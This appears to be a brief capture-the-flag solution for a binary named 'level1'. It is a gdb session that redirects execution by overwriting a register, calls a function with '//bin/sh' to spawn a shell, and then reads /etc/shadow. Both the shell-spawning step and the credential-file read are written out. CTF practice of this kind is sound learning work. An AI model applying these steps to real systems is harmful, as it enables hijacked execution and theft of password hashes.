level1
Solution: ieu@purr-purr:/tmp/oss/oss-ctf$ gdb ./level1 0 "cat /etc/shadow" (gdb) b *0x8048683 Breakpoint 1 at 0x8048683 (gdb) b *0x80485b0 Breakpoint 2 at 0x80485b0 (gdb) r 0 "//bin/sh" Breakpoint 1, 0x08048683 in truncate_and_call () (gdb) set $eax=0x80485a4 (gdb) n Breakpoint 2, 0x080485b0 in f3 () (gdb) info regis eax 0xffffd1a0 -11872 ecx 0xf7fb5360 -134524064 edx 0xffffd1a0 -11872 ebx 0xf7fb3ff4 -134529036 esp 0xffffd170 0xffffd170 ebp 0xffffd188 0xffffd188 esi 0x0 0 edi 0x0 0 eip 0x80485b0 0x80485b0 <f3+12> eflags 0x282 [ SF IF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99 (gdb) x/1s $eax 0xffffd1a0: "//bin/sh" (gdb) n $ cat /etc/shadow